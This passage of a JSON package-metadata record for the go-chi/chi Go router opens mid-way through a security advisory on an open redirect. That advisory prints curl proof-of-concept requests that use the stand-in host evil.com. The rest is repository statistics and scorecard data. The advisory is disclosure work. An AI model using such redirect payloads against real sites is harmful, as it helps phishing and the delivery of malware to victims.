information.\n\n```bash\n$ curl -I  localhost:8081/\\\\evil.com/\nHTTP/1.1 301 Moved Permanently\nContent-Type: text/html; charset=utf-8\nLocation: /\\evil.com\n```\n\n```bash\n$ curl -I  localhost:8081/%5Cevil.com/\nHTTP/1.1 301 Moved Permanently\nContent-Type: text/html; charset=utf-8\nLocation: /\\evil.com\n```\n\nThis opened in a browser (Chrome, Firefox) will result in a transformation to `//evil.com` which in turn will result in a redirect to `evil.com`.\n\u003cimg width=\"200\" alt=\"image-20250829115619807\" src=\"https://github.com/user-attachments/assets/44aedad1-64b6-4660-8b26-fad9b4eca036\" /\u003e\n\n\n\u003cimg width=\"200\" alt=\"image-20250829115632067\" src=\"https://github.com/user-attachments/assets/b976d47d-1975-469c-abd3-deb907a68db2\" /\u003e\n\n\n### Impact\n\nThis essentially consists of an open redirect vulnerability, provided that victim users use the most popular browsers (Chrome, Firefox, etc. It does not work in e.g. Safari).\n\nThe attacker can construct a malicious URL on a domain of a legitimate website and send it to the victim user. The victim users thinking that they will click on a legitimate website's URL, they will unknowingly be reidrected to an attacker controlled website.\n\nThis can lead to credential theft if the victim gets redirected to a phishing website, to malware that is hosted on the attacker controlled website etc. Also, it has a greate reputation / business impact for the affected legitimate website.\n\nIn order to exploit this vulnerability the attacker does not need to be authenticated or have ay other priviledge / knowledge regarding the affected application.\n\nCVSS Score: [4.7 (Medium)](https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N)","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-01-14T21:18:06.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.7,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N","references":["https://github.com/go-chi/chi/security/advisories/GHSA-mqqf-5wvp-8fh8","https://github.com/go-chi/chi/issues/1037","https://github.com/go-chi/chi/commit/6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","https://github.com/advisories/GHSA-mqqf-5wvp-8fh8"],"source_kind":"github","identifiers":["GHSA-mqqf-5wvp-8fh8"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-14T22:00:08.040Z","updated_at":"2026-04-05T20:01:31.161Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tcXFmLTV3dnAtOGZoOM4ABRGi","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tcXFmLTV3dnAtOGZoOM4ABRGi","packages":[{"ecosystem":"go","package_name":"github.com/go-chi/chi","versions":[{"first_patched_version":"5.2.4","vulnerable_version_range":"\u003e= 5.2.2, \u003c 5.2.4"}],"purl":"pkg:go/github.com%2Fgo-chi%2Fchi"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tcXFmLTV3dnAtOGZoOM4ABRGi/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-chi/chi","docker_dependents_count":1775,"docker_downloads_count":2216519825,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-chi/chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-chi/chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14695721,"name":"github.com/go-chi/Chi/v5","ecosystem":"go","description":null,"homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/Chi","keywords_array":[],"namespace":null,"versions_count":24,"first_release_published_at":"2026-06-29T12:50:38.589Z","latest_release_published_at":"2026-07-05T18:51:45.000Z","latest_release_number":"v5.3.1","last_synced_at":"2026-08-11T01:34:33.972Z","created_at":"2026-06-29T12:49:54.688Z","updated_at":"2026-08-11T01:34:33.973Z","registry_url":"https://pkg.go.dev/github.com/go-chi/Chi/v5","install_command":"go get github.com/go-chi/Chi/v5","documentation_url":"https://pkg.go.dev/github.com/go-chi/Chi/v5#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-08T10:51:34.057Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":4.93515940445008,"dependent_packages_count":4.624504289510877,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.779831846980478},"purl":"pkg:golang/github.com/go-chi/%21chi/v5","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-chi/Chi/v5","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-chi/Chi/v5","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-chi/Chi/v5/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FChi%2Fv5/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FChi%2Fv5/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FChi%2Fv5/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FChi%2Fv5/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FChi%2Fv5/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2FChi%2Fv5/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":4032598,"name":"gopkg.in/go-chi/chi.v0","ecosystem":"go","description":"","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"gopkg.in/go-chi","versions_count":1,"first_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_number":"v0.9.0","last_synced_at":"2026-08-12T02:06:13.435Z","created_at":"2022-04-12T09:08:18.407Z","updated_at":"2026-08-12T02:06:13.435Z","registry_url":"https://pkg.go.dev/gopkg.in/go-chi/chi.v0","install_command":"go get gopkg.in/go-chi/chi.v0","documentation_url":"https://pkg.go.dev/gopkg.in/go-chi/chi.v0#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T